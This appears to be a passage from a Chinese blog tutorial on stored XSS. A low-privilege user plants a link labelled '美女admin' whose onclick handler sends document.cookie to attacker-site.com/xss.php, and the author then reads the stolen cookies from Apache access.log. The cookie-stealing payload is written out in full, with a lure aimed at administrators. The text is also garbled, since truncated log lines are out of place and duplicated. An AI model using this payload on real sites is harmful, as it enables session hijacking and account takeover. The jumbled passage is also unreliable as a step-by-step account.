接着前两篇来的,攻击者可以通过一个普通用户登录进来,然后在输入框中提交以下数据:
172.29.32.182 - - [17/Apr/2014:15:46:18 +0800] "GET /favicon.ico HTTP/1.1" 404 1675
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.11 - - [19/A
<a href=# οnclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">美女admin </a>
方法一:Apache access.log
这样根据home.php的过滤条件,如果是admin账户,就会显示含有"美女admin"的列表,然后如果是点击了"美女admin" 的链接,他cookie就可以被收集到我的服务器上(这里是被动式的触发的漏洞,具有一定的猥琐性),搭建的XSS平台一定也有挺多的简单方法,最简单的就是在Apache的access.log中查看,类似的日志是:172.29.32.182 - - [17/Apr/2014:15:46:18 +0800] "GET /favicon.ico HTTP/1.1" 404 1675
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.11 - - [19/A